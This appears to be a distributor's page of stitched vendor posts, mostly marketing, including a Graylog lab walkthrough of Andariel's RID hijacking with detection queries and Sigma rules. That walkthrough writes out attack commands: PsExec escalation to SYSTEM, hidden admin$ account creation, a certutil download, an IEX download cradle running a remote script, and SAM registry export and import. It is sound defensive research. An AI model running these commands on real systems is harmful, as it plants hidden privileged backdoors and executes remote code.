Skip to content

Fortune 100 Company Successfully Deploys dope.security on 18k+ Devices in Record Time

Deploying a security tool at any company is not straightforward. It’s a balancing act that requires the right combination of product stability, technical integrations, skilled personnel on both sides, and many other variables. This becomes increasingly more challenging if you are a large enterprise customer.

These are just a few of the challenges that can come up:

1. Customization and Integration Requirements

Tailored Needs

Each organization has unique security requirements, so off-the-shelf tools often need heavy customization to meet specific needs. Enterprises can have several pre-existing security tools and general applications in both cloud and hybrid environments, making it necessary to integrate new incoming tools with these existing SIEM systems, firewalls, VPNs, and more. For example, part of this integration could be setting up SSL Inspection bypasses for certain applications or changing computer networking paths so that they don’t break a VPN.

2. Resource and Expertise Constraints

Limited Security Personnel

Legacy systems can be complex to deploy and manage on an ongoing basis and, therefore, require a dedicated team. Not all organizations can afford or have the existing team hierarchy to support this. This can make large-scale deployments, especially in enterprises with thousands of employees, expensive from a time and cost perspective. Since most legacy tools are too complex, organizations must invest in dedicated teams around the globe to maintain them or hire expensive third-party services to run the deployment.

3. Maintenance and Continuous Updating

Frequent Updates

Cybersecurity tools require regular updates to stay effective against external threats and meet internal needs. Manually coordinating these with the company through phased deployments, auto upgrades, and uploads into tools like InTune can be tough and time-consuming. Within the tool itself, slow feedback on configurations can drastically slow down deployments. These configurations can include things like policy updates. Legacy tools have a polling mechanism that takes 30 minutes to an hour to pull the latest policy down from the cloud. This means longer wait times for updates to take effect.

4. Re-work when moving from POC to Production

Non-Production Trials

Most cybersecurity POC environments are shut down after the trial. After purchase, the customer receives a completely fresh production tenant to be re-configured to fit the environment. It can be frustrating, as all work to date is thrown away, including SSO configs, policies, and more.

How does dope.security handle these challenges?

dope.security enabled a Fortune 100 customer to deploy the dope agent at an average of 3,000 devices per week and grow from 900 devices to over 18,000 devices in a matter of weeks by focusing on four key areas.

1. Product Stability

dope.security has built an on-device SSL proxy that performs all SWG capabilities on the user’s laptop—URL Filtering, Cloud App Controls, SSL Inspection, and more. This refreshed architecture, which removes the need for backhauling data to a remote data center, makes dope.swg the most reliable and stable proxy available regardless of the state, country, or office you’re in. The Fly-Direct Architecture also makes policy configurations very stable, consistent, and fast, which is critical during deployments. Updating policies in real-time at the individual and group levels makes the entire rollout process much more efficient and quicker. It also ensures the right security policies are applied to the correct individuals instantly.

2. Deployment Experience

Deploying the dope.security agent is extremely easy whether you’re installing 200 or 20,000 devices because there is no manual configuration or customization a customer has to make before installing.

In this specific case, the customer easily deployed InTune silently across their organization. Because no extra configuration was required after the agent was installed, the customer instantly blocked malicious websites and traffic across their deployed devices. Our clear guide to InTune deployments clarified any frequently asked questions.

The entire process from the initial free production trial was one click without excessive help from the dope security team. After purchase, the same trial was converted into a paid account—no additional configuration was required.

3. Global Technical Support Team

First, dope.security focuses on building strong relationships with the customer implementation team. This means having regular check-ins either through status calls, dedicated Slack channels, or email. Regular check-ins ensure that no bug or deployment hurdle goes unnoticed.

Second, the dope.security technical team consists only of product engineers who have in-depth knowledge of the product and how it works. There are no generic Tier 1 support agents whose only job is to escalate a customer to the next tier for assistance. This means the technical support team can answer any question in real time, dramatically increasing the productivity and speed of resolving issues.

4. SSL Error Notifications

A very common issue with proxy deployments is errors due to SSL Inspections breaking applications. Typically, the process to fix this is to implement a bypass rule. But with most SWG providers, this is extremely manual and not straightforward.

dope.security simplified this and built an SSL notification feature. The dope agent identifies and reports when it has broken traffic due to SSL cert pinning. It allows the admin to view these SSL errors in the dope console and easily create either application or domain bypasses in a few clicks. This feature is unique to dope.security, enabling deployments to move much quicker as admins don’t need to spend time manually hunting for why specific applications are breaking and their associated domains, URLs, or extensions to create bypass lists. dope.security automatically identifies, reports, and provides the data you need directly in the console.

dope.security enabled a Fortune 100 customer to deploy the dope agent at an average of 3,000 devices per week and grow from 900 devices to over 18,000 devices in a matter of weeks

This Fortune 100 customer rollout is just one case that shows how dope.security has redefined cybersecurity deployments. It no longer needs to be an extremely long, arduous process that requires tons of resources, time, and effort. From initial onboarding to ongoing maintenance of the deployment, dope.security makes everything much simpler through product stability, understanding customer needs, and providing dedicated, knowledgeable support.

Request a demo or trial

About Dope Security

A comprehensive security solution designed to protect individuals and organizations from various cyber threats and vulnerabilities. With a focus on proactive defense and advanced technologies, Dope Security offers a range of features and services to safeguard sensitive data, systems, and networks.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

IT Solutions: How companies benefit from them

 
 

What are IT solutions?

“That’s the solution!” is how an IT solution should ideally feel. It should solve an existing problem, lead to process optimization or ensure efficient target achievement.

On the technical side, this includes the following:

  • software
  • hardware 
  • data
  • infrastructure, and
  • security mechanisms.

On a qualitative level, these factors include:

  • consulting
  • integration
  • support, and 
  • other services, as necessary. 

Examples include ERP systems, cloud services, IT security solutions, databases, communication platforms and automation tools. 

IT solutions: Definition

An IT solution is a comprehensive approach that goes beyond the mere application of software. It combines components such as hardware, infrastructure, services, integration, support or consulting. It is often individually tailored to a company in order to meet its specific needs.

An IT solution is different from software because it is a complex concept. It may comprise several software products and other elements.

Tobias Kortas

 

What types of problems are solved?

In the corporate world, there are countless problems and opportunities to use information technology in a meaningful way. It is important that an IT solution brings peace of mind to business owners. 

IT solutions: Examples

The following examples use specific categories to illustrate the types of IT solutions available. Each type addresses specific requirements in companies or organizations.

Example #1: Information centralization

These include solutions such as ERP, CRM and HR systems. These are comprehensive, scalable IT solutions that meet the complex requirements of large companies. They integrate various systems and processes, such as financial management, customer relationship management (CRM) or human resources (HR). One of the aims is to manage data centrally and optimize company-wide processes.

Example #2: Data management

Data management solutions help companies organize, store, protect and analyse data effectively and purposefully. In the best case scenario, better decisions can be made based on this and processes can be sensibly revised.

Example #3: Increased IT security

Protecting systems and networks from threats such as hacker attacks or malware is of fundamental importance. The spectrum ranges from firewalls, encryption, analysis and incident identification to comprehensive protection of sensitive company data through an Information Security Management System (ISMS).

Example #4: Communication and collaboration

In the modern corporate world, business has changed. Remote work and large geographical distances are now the norm. Team members must communicate with each other and external parties in a targeted manner. 

By using the right communication and collaboration platforms a strong culture is developed. This also improves the quality of collaboration.

Example #5: Automation and AI

Artificial intelligence (AI) and process automation lead to better outputs. For example, companies benefit from AI chatbots for support or use machine learning for better workflows. The list of benefits of artificial intelligence is long. Related solutions should always should always focus on the practical benefits. 

Example #6: E-commerce

An e-commerce solution supports companies in setting up and operating online stores. It includes functions such as product management, payment processing, ordering processes and marketing tools. An important goal is to offer customers a seamless shopping experience. 

Example #7: Industry-specific solutions

An industry-specific IT solution optimizes processes according to specific requirements. Examples of this include electronic patient records in the healthcare sector or trading systems in the financial sector. In most cases, the aim is to be competitive within one’s own industry or to offer clients a good service.

Application in large companies

Large companies (enterprises) usually have complex IT environments. Each department usually has its own requirements, prerequisites and success metrics. 

Needless to say, solutions must cover a wide range of application scenarios. Selected systems must have a wide range of functionalities,  be highly scalable and integrate easily.

Examples of enterprise solutions include: 

  • ERP systems – for managing business processes
  • CRM tools for customer relationship management or 
  • Data analysis solutions such as business intelligence platforms. 

Use in small and medium-sized enterprises (SMEs) 

Large companies tend to focus on goals such as process optimization, greater security or staying ahead of the competition. In contrast, small and medium-sized enterprises are increasingly focusing on factors such as:

  • cost savings,
  • process digitalization and
  • diving growth.

These require effective solutions that deliver as much performance as possible at the lowest possible cost. They must also be scalable to support the business as it grows.

Typical IT solutions for SMEs may include:

  • Cloud-based business software such as Microsoft 365, 
  • Collaboration tools such as Slack or Trello, or 
  • CRM systems such as HubSpot.

However, IT security also plays an important role here. And, depending on their model, e-commerce solutions, such as web store services, may be practical. 

Customized IT solutions

It’s like clothing: Tailor-made fits best. 

IT service providers can develop options that are individually tailored to specific company needs. These are highly beneficial when there are unique business processes for which a standard offering is not sufficient. For example, automation of a unique business process may be developed individually. 

Of course, a cost-benefit analysis would reveal whether this is possible. In commercial terms, the ROI must be calculated before such a project begins.

Sometimes, these are created in-house. These can be helpful as an interim answer. This gives room for advance planning that will support the longer-term business goals. 

 

Tip: Since customized solutions also mean a high cost factor, it is advisable to choose an IT solution that can be easily adapted to individual needs and requirements.

Tobias Kortas

 

What does your business need today?

When investing in a new solution, it should deliver on an overarching benefit. Examples may be better service provision, reliable security or concrete time savings.

Below are some key benefits to consider. 

1. Greater efficiency

Companies strive for productive and effective work. They also aim for the best possible results with the least possible effort – efficiency. In concrete terms, optimizing or automating processes can save a lot of time, money and resources. At the same time, optimized processes lead to better results. 

2. Increased customer satisfaction

The customer is king. Companies depend on the loyalty of their customers. By using the right tools, processes and training customer satisfaction increases. 

An example of using a solution would be improving communication or enabling personalized services and quick responses to inquiries. A self-service portal, for example, can guide customers quickly to the answers they are looking for.  

3. Competitive advantage

The right IT solution helps companies gain valuable advantages over the competition. For example, automated processes or targeted workflow management can lead to faster and more cost-effective work. AI and IoT technologies also make it  possible to develop new products, services or business models,

4. More security and compliance

The right IT solutions lead to better security in a variety of ways. Examples include data encryption, access controls, backups and restores. 

Professional device management – the proper administration of various devices – also provides effective protection against unauthorized access or data loss. 

In addition, the right IT solutions support compliance with legal requirements, which is particularly important in highly regulated industries.

5. Better decision-making

IT can pave the way for clarity and documentation of data that drives better decisions. 

Data can “nudge” targeted user behavior. Applications such as AI-based summaries can provide a quick overview of complex processes. This means a quick decision about the next step can be made. 

Remember: the cost-benefit ratio must be right 

IT solutions offer many other solutions too. Examples include an optimized user experience, 24/7 service and cost savings through proven IT solution providers.

But, it is crucial that the cost-benefit ratio is high. Companies should have clarity on how they will benefit from selected solutions. Where this can vary greatly from company to company, steps such as a company-specific selection makes sense.

Solving customer problems

OTRS offers customized IT solutions that can be used for many different purposes across all industries. Through good adaptability, fast implementation and reliable local support OTRS customers solve a vast number of operational problems. 



Learn more

 

Often addressed areas in which OTRS Group works, include:

Conclusion: Apply technology for success

If you have a problem, you should look for a suitable solution as quickly as possible – and find it. This is no different in IT. The subtle difference is that IT often forms the basis for a company’s success. 

It is important to point out the difference between pure software and an IT solution. A solution solves a business problem by using software, services, processes and more. 

Users benefit from the focus on finding benefit-oriented answers to their problems. This includes options that improve upon processes and workflows, security and data-driven – decisions.

Find out how you can best benefit from OTRS IT solutions.


About OTRS

OTRS (originally Open-Source Ticket Request System) is a service management suite. The suite contains an agent portal, admin dashboard and customer portal. In the agent portal, teams process tickets and requests from customers (internal or external). There are various ways in which this information, as well as customer and related data can be viewed. As the name implies, the admin dashboard allows system administrators to manage the system: Options are many, but include roles and groups, process automation, channel integration, and CMDB/database options. The third component, the customer portal, is much like a customizable webpage where information can be shared with customers and requests can be tracked on the customer side.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Adversary Tradecraft: A Deep Dive into RID Hijacking and Hidden Users

Researchers at AhnLab Security Intelligence Center (ASEC) recently published a report on the Andariel threat group, a DPRK state-sponsored APT active for over a decade, that has been leveraging RID hijacking and user account concealment techniques in its operations to stealthily maintain privileged access to compromised Windows systems.

 

This blog post explores hands-on how RID hijacking and hidden backdoor accounts work in Andariel’s attack chain, and how Graylog Security can be used to detect and analyze similar activity in an organization’s network.

 

What is RID Hijacking?

The RID, or Relative Identifier, uniquely identifies a user in Windows as part of its Security Identifier (SID). When a user logs on, the system retrieves the SID for that user from the local Security Account Manager (SAM) database and places it in the user’s access token to identify it in subsequent interactions. The local Administrator account RID is always 500, and standard user RIDs usually start at 1001.

RID hijacking is a technique discovered by Sebastian Castro that involves modifying the RID value of a low-privileged account to match the value of a privileged account such as local Administrator by manipulating the SAM database. As a result, the operating system mistakenly grants elevated privileges to the originally restricted account, allowing the attacker to execute privileged commands as that user.

This technique is particularly stealthy because the activity in event logs will still be associated with the low-privilege user and there is often less scrutiny applied to standard accounts.

However, there is a caveat to the technique – it requires SYSTEM level privileges to access and modify user information in the SAM, which resides in a protected registry key.

 

Attack Demonstration

According to the report from AhnLab, the threat actor’s RID hijacking process consists of the following stages. We’ll use this model as we walk through the attack in a lab environment.

RID Attack Demonstration

The RID Hijacking attack process referenced from AhnLab

 

Our lab consists of a Windows 10 Enterprise system with auditing enabled for process execution (command line included), account logon and management, registry, and SAM access. Script block logging is also turned on.

 

System, Security, and PowerShell/Operational event logs are sent via Winlogbeat to a Graylog Enterprise 6.0.1 instance with Illuminate 6.1 installed to enable parsing and enrichment.

 

Stage 1: SYSTEM Privilege Escalation

 

We’ll assume initial access to the Windows system and start off with an elevated admin user. However, in order to access the SAM registry hive, we need SYSTEM. To do this, we can use exploits like JuicyPotato or tools like PsExec, a Microsoft Sysinternals tool often abused by adversaries for lateral movement and privilege escalation. We’ll spawn a PowerShell session using PsExec with the -s argument:

 

PsExec.exe -s -i powershell.exe

 

The output of whoami /user in the shell confirms that we’re now running as SYSTEM.

Whoami Output  

In Graylog, we can see a common indicator of Sysinternals PsExec activity, Event ID 7045 Remote Service Creation with the default service name PSEXESVC. Following the subsequent events (ordered bottom to top) we see our whoami command executed as Local System.

Command Executed  

Stage 2: Create User Account

 

Having obtained SYSTEM, the adversary proceeded to create a hidden local user account and add it to privileged groups. These are the commands used:

net user admin$ admin@123 /add
net localgroup “Remote Desktop Users” “admin$” /add
net localgroup “Administrators” “admin$” /add

 

The trick to hiding the user here is the $ at the end of the username. It’s an old school technique that imitates computer accounts which are hidden from some user listing options – note that the newly created user isn’t shown in the output of net user.

net user

In Graylog we see the commands as event ID 4688 labeled as “process started”, and additional labels for 4720 “account created” and 4732 “group member added”.

ID 4688 and 4720

 

Stage 3: Modify the RID Value in Registry

 

Before demonstrating the RID hijack, let’s see what the current RID value and permissions are for the user admin$. We’ll open a separate command prompt and spawn a shell as that user using runas:

runas /user:admin$ cmd

 

Then, execute whoami commands in that shell. As shown, the user’s current RID is 1009 and its privileges are limited as expected for a standard user.

RID Value

Well, as the chefs say, elevate it!

 

Back to the PowerShell session as SYSTEM, we can run regedit.exe to open the GUI registry editor in the same privilege context.

 

User information is stored in the SAM hive in unique subkeys under:

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

 

Each subkey corresponds to an account where the key name is the hexadecimal representation of the decimal user RID. The value 1009 for admin$ translates to 0x3F1, so we’re looking at the key 000003F1.

Hex Value

Within key 000003F1 the actual RID can be found in the value F which contains binary data. As highlighted, the RID value is located at offset 30 and stored in little-endian format.

SAM Key

To execute the hijack, we need to overwrite this value with the local Administrator RID of 500 (0x1F4) converted to little-endian as shown below.

Hex Key Value

 

 

With that modification, admin$ should now be given the elevated RID 500 upon logon. If we open a new command prompt as the user and run whoami /user, we see the new hijacked RID, though the rest of the SID stays unchanged. Running whoami /priv  shows that the user has been granted admin privileges.

RID 500

We can hunt in Graylog for activity associated with non-Administrator accounts that have the RID 500 using the following query:

NOT user_name:administrator AND user_id:/.*\-500/

Administrator user 500

This query might result in false positives if the administrator account is renamed. We can further specify it to target both RID hijacking and user accounts mimicking machine names.

user_name:/.*\$/ AND user_id:/.*\-500/

 

Custom and Open-source Tooling

AhnLab Report

Manually altering SAM user information in the registry editor is good for demonstration, but it isn’t necessarily what threat actors are doing.

 

The AhnLab report details that Andariel utilized two distinct custom tools to automate the RID hijacking attack process. One of the tools named CreateHiddenAccount is open-source and available on GitHub.

 

AhnLab breaks down the differences between the tools quite well in its report:

AhnLab Report
Differences in tool behavior referenced from AhnLab

 

 

CreateHiddenAccount is particularly interesting since it can work without SYSTEM privileges. It still needs access to the SAM registry key, so it employs the Windows CLI program regini to edit the registry through a .ini file. The file contains parameters to open up the SAM registry key access permissions to allow modification with administrator privileges.

 

 

Let’s execute the CreateHiddenAccount tool in a fresh Graylog lab to see what events are produced. First, download the UPX packed variant to the Windows host.

 

certutil.exe -urlcache -split -f https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_upx_v0.2.exe CreateHiddenAccount_upx_v0.2.exe

 

The command line arguments require the hidden user to create (the $ is appended automatically) and the target user whose RID will be cloned. Here, we’re again creating the user admin$ and targeting the local admin RID.

CreateHiddenAccount_upx_v0.2.exe -u admin -p admin@123 -cu Administrator

Create Hidden Account

 

The tool produces some interesting events to analyze in Graylog. Directly after execution we see regini.exe being used to modify the access control rules of the SAM registry key.

Regini Being Used

Following that is a flurry of user enumeration events and account creation for admin$. Interestingly, we see the tool deleting the hidden user then silently importing a .reg file using regedit. What’s happening here is that the tool already populated the import file with information from the user registry key before it was deleted, and modified the RID in the file to match Administrator’s. This is an additional step to hide the created user as once the registry key is restored, the user becomes hidden from additional user list interfaces.

Enumeration Events

Those with their detection hat on might notice that the filenames are notably unique and static throughout the tool execution. These names are actually hardcoded in the source code, seen in the function below.

Tool Execution

This presents an opportunity to detect CreateHiddenAccount execution via child process command lines where the unique filenames are present. Note though that this is considered a brittle detection – while it can reliably identify this particular version of CreateHiddenAccount unmodified, it is trivial for the adversary to change these filenames in the source before compiling to an executable.

 

Nonetheless, it’s useful in a threat hunt or to detect the vanilla tool. We can use the following query:

process_command_line:(/.*N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8\.ini/ OR /.*sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko\.reg/)

Process Command Line

 

The tool by itself doesn’t do much in the way of behavior obfuscation or sandbox evasion. Querying its hash on VirusTotal returns some damning results.

VirusTotal

 

Further Attempts to Hide Users

 

In addition to hiding the backdoor user account with a username ending in $, the custom tool used by Andariel attempts to further conceal the account through deletion and registry import operations. We analyzed a similar feature in CreateHiddenAccount, but now we’ll carry out the technique separately and see what can be gleaned from the logs.

 

As demonstrated below, we repeat the steps of SYSTEM privilege escalation and hidden user account creation, but this time we run a PowerShell download cradle to fetch and execute in-memory a RID hijacking script from GitHub. This leaves us with the account given administrator privileges without further action to conceal it.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/r4wd3r/RID-Hijacking/master/Invoke-RIDHijacking.ps1'); Invoke-RIDHijacking -User 'admin$' -RID 500

Powershell Script Run

 

Graylog Illuminate captures the PowerShell script execution and even extracts the SAM registry key path being modified for RID hijacking.

Fake Computer Name

Even with the fake computer name, the hidden user still shows up in Computer Management.

Computer Fake Name

 

Following along with the Andariel threat group’s tool methods, we run commands to:

 

A) Fetch the hidden user’s RID

Get-WmiObject Win32_UserAccount | Where-Object { $_.Name -eq 'admin$' } | Select-Object Name, SID

 

B) Export the hidden user’s associated registry keys in the SAM hive

reg export hklm\sam\sam\domains\account\users\names\admin$ names.reg
reg export hklm\sam\sam\domains\account\users\0000XXXX users.reg

 

C) Delete the user

net user admin$ /delete

 

D) Restore the user by importing the registry files containing the user keys information

reg import names.reg
reg import users.reg

 

By using this method, admin$ is no longer displayed in Computer Management, at least until a system reboot.

No Admin User Shown

 

Every step of the execution can be seen in Graylog.

Attack Steps Log

 

Detections

 

We’ve provided Sigma rules below to detect the following aspects of the attack chain:

 

  • Hidden user account with Administrator RID
  • RID hijacking via CreateHiddenAccount
  • Export of SAM users registry keys via reg.exe

 

With Graylog Security, we can manually add these rules and configure timed search intervals to detect the activity in our log ingest.

 

The Sigma engine in Graylog provides an option to search the logs using the detector before deployment. This way you can also see the exact search query the rule translates to.

Sigma Rule Added

Rule #1

title: Illuminate - Hidden User Account With Administrator RID
id: 531bfab7-d18c-4f51-bae0-64cf38cae3d5
status: experimental
description: Detects special privileges assigned to a hidden account manipulated with admin RID hijacking
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
detection:
    selection_event:
        EventID: 4672
    selection_name:
        SubjectUserName|endswith: '$'
    selection_rid:
        SubjectUserSid|endswith: '-500'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

Rule #2

title: Illuminate - RID Hijacking Via CreateHiddenAccount
id: 8b8fdf38-4e34-4d7b-bdaa-b3b9920fb80b
status: experimental
description: Detects the open-source tool CreateHiddenAccount (unmodified) used by Andariel threat group for RID hijacking
references:
    - https://github.com/wgpsec/CreateHiddenAccount/
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.privilege-escalation
    - attack.t1078
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8'   # regini .N2kvMLEQiiHHNWXFpEg7uaNmcu9ic95j8.ini
            - 'sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko'    # regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg
    condition: selection
falsepositives:
    - Unknown
level: high

Rule #3

title: Illuminate - Export of SAM Users Registry Keys Via Reg.exe
id: 0709625a-4703-47ba-acfd-3beaa4d0f1dc
status: experimental
description: Detects export of SAM user account information via reg export
references:
    - https://asec.ahnlab.com/en/85942/
author: JL (Graylog)
date: 2025/02/04  # Graylog format
tags:
    - attack.credential_access
    - attack.t1003.002
    - attack.persistence
    - attack.t1098
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'export'
            - 'hklm\sam\sam\domains\account\users\'
    condition: selection
falsepositives:
    - Administrative scripts or forensic investigations
level: high

Graylog  Detections

Graylog has provided the Sigma Rules here to share threat detection intelligence with those not running Graylog Security. Note that Graylog Security customers receive a content feed including Sigma Rules, Anomaly Detectors, and Dashboards, and other content to meet various security use cases. For more about Sigma Rules, see our recent blog “The Ultimate Guide to Sigma Rules

To learn how Graylog can help you improve your security posture, contact us today or watch a demo.

About Graylog  
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Modernized VMware Migration: How Scale Computing Eases the Move

Scale Computing Executive Spotlight: VMware Migration

Migrating away from VMware can seem overwhelming, with fears of complexity and downtime creating uncertainty about where to start and how to proceed. But it doesn’t have to be that way. In our latest video, Scale Computing CEO Jeff Ready explains how our entire team has spent years perfecting the migration process, ensuring that customers enjoy a smoother, simpler path to IT modernization.

For many organizations, the first hurdle in considering a VMware alternative is the migration process itself. Will it integrate with our existing infrastructure and tools? What about the ecosystem of backup and security software tied to VMware? As Jeff explains, Scale Computing has been tackling these challenges for years, long before Broadcom’s acquisition of VMware. Armed with the right tools and the infrastructure experts at the ready to ensure a seamless and efficient transition, we’re here to help guide you through every step of your migration journey.

Scale Computing’s tailored approach ensures that each migration is optimized for each customer’s unique environment. Jeff further explains how Scale Computing leverages a diverse set of tools and methodologies across a broad spectrum of use cases to successfully migrate practically every type of application from VMware to the SC//Platform. The collective expertise of our team ensures that our customers and partners can be fully confident that their workloads will transition smoothly and that their IT systems will remain resilient both during and after the move.

However, what really makes Scale Computing stand out from the crowd isn’t just our migration expertise, but SC//Platform itself. Unlike VMware, which was developed decades ago, Scale Computing continues to actively invest in the latest groundbreaking automation and AI technologies into its solutions. As one of the top five VMware alternatives recommended by DCIG, Scale Computing offers not just a replacement but a significant upgrade that enables organizations to reduce complexity, enhance performance, and future-proof their IT operations.

If you’ve been considering moving away from VMware but are wary of the potential complications, it’s time to rethink what’s possible. Watch the full video to hear Jeff explain how Scale Computing delivers a seamless, stress-free migration experience and why we’re recognized as a leader in VMware alternatives.

About Scale Computing 
Scale Computing is a leader in edge computing, virtualization, and hyperconverged solutions. Scale Computing HC3 software eliminates the need for traditional virtualization software, disaster recovery software, servers, and shared storage, replacing these with a fully integrated, highly available system for running applications. Using patented HyperCore™ technology, the HC3 self-healing platform automatically identifies, mitigates, and corrects infrastructure problems in real-time, enabling applications to achieve maximum uptime. When ease-of-use, high availability, and TCO matter, Scale Computing HC3 is the ideal infrastructure platform. Read what our customers have to say on Gartner Peer Insights, Spiceworks, TechValidate and TrustRadius.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

How to find Siemens devices on your network

Multiple vulnerabilities (February  2025)

Siemens disclosed multiple vulnerabilities in various product lines:

  • SSA-111547 – cleartext storage of sensitive information in SIPROTEC 5 (CVSS score 5.1)
  • SSA-195895 – user enumeration vulnerability in the web server of SIMATIC Products (CVSS score 6.9)
  • SSA-224824 – denial of service vulnerabilities in SIMATIC S7-1200 CPU Family before V4.7 (CVSS score 8.7)
  • SSA-246355 – multiple vulnerabilities in Tableau Server Component of Opcenter Intelligence before V2501 (CVSS score 10.0)
  • SSA-342348 – insufficient session expiration vulnerability in Siemens SIMATIC PCS neo, TIA Administrator, and TIA Portal (CVSS score 8.7)
  • SSA-687955 – accessible development shell via physical interface in SIPROTEC 5 (CVSS score 7.0)
  • SSA-698820 – multiple vulnerabilities in FortiGate NGFW before V7.4.4 on RUGGEDCOM APE1808 devices (CVSS score 9.0)
  • SSA-767615 – information disclosure via SNMP in SIPROTEC 5 devices (CVSS score 8.7)
  • SSA-769027 – multiple vulnerabilities in SCALANCE W700 IEEE 802.11ax devices before V3.0.0 (CVSS score 8.6)
  • SSA-770770 – multiple vulnerabilities in FortiGate NGFW before V7.4.5 on RUGGEDCOM APE1808 devices (CVSS score 7.5)

What is the impact?

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions, disclosure of sensitive information, or access to the underlying filesystem.

Are updates or workarounds available?

For the disclosed vulnerabilities, Siemens has released updates or patches. Siemens recommends that access is restricted to trusted sources. Refer to Siemens’ website for more information about their operational guideline recommendation.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:"SCALANCE M8" OR hw:"SIMATIC" OR hw:"RUGGEDCOM" OR hw:"SCALANCE"

Ten vulnerabilities disclosed in Siemens products (December 2024)

Siemens disclosed ten vulnerabilities in a variety of Siemens products, including their RUGGEDCOM, SENTRON, and other product lines. These vulnerabilities have CVSS scores that range from 5.1 (moderate) to 8.6 (high).

The disclosed vulnerabilities range in severity. For the most the critical vulnerabilities, unauthenticated remote attackers could perform unauthorized administrative actions if they are able to get a local user to click on a malicious link. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions or disclosure of sensitive information.

Siemens has released updated patches for these vulnerabilities.  Siemens also recommends that all systems be kept behind firewalls and have unnecessary services disabled.

How to find potentially vulnerable systems

From the Asset Inventory, use the following query to locate systems running potentially vulnerable software:

vendor:Siemens

 

Multiple vulnerabilities (November 2024)

Siemens disclosed multiple vulnerabilities in various product lines:

  • SSA-354112 – multiple vulnerabilities in SCALANCE M-800 Family devices (CVSS score 8.6)
  • SSA-654798 – unauthenticated remote access to the filesystem in SIMATIC CP devices (CVSS score 8.7)
  • SSA-454789 – deserialization of untrusted data in TeleControl Server (CVSS score 10.0)

What is the impact?

The disclosed vulnerabilities range in severity. For the most critical vulnerabilities, unauthenticated remote attackers could execute arbitrary code and completely take over a vulnerable system. Successful exploitation of other disclosed vulnerabilities could result in denial-of-service conditions, disclosure of sensitive information, or access to the underlying filesystem.

Are updates or workarounds available?

For the disclosed vulnerabilities, Siemens has released updates or patches. Siemens recommends that access is restricted to trusted sources. Refer to Siemens’ website for more information about their operational guideline recommendation.

How to find potentially vulnerable systems

From the Asset Inventory, runZero users applied the following query to locate systems running potentially vulnerable software:

hw:"SCALANCE M8" OR hw:"SCALANCE S615" OR hw:"SIMATIC CP" OR (os:"Windows" AND tcp_port:26865)

35 vulnerabilities (September 2024)

Siemens disclosed 35 vulnerabilities in a variety of Siemens products, including their LOGO!, SIMATIC, SINEMA, and other product lines. These vulnerabilities have CVSS scores that range from 4.3 (moderate) to 10 (extremely critical).

The most critical vulnerabilities disclosed include:

  • SSA-955858 – multiple vulnerabilities in LOGO! 8 BM devices (CVSS score 9.8)
  • SSA-832273 – multiple vulnerabilities in RUGGEDOM devices (CVSS score 9.8)
  • SSA-721642 – multiple vulnerabilities in SCALANCE devices (CVSS score 9.1)
  • SSA-673996 – multiple vulnerabilities in SICAM and SITIPE devices (CVSS score 8.2)
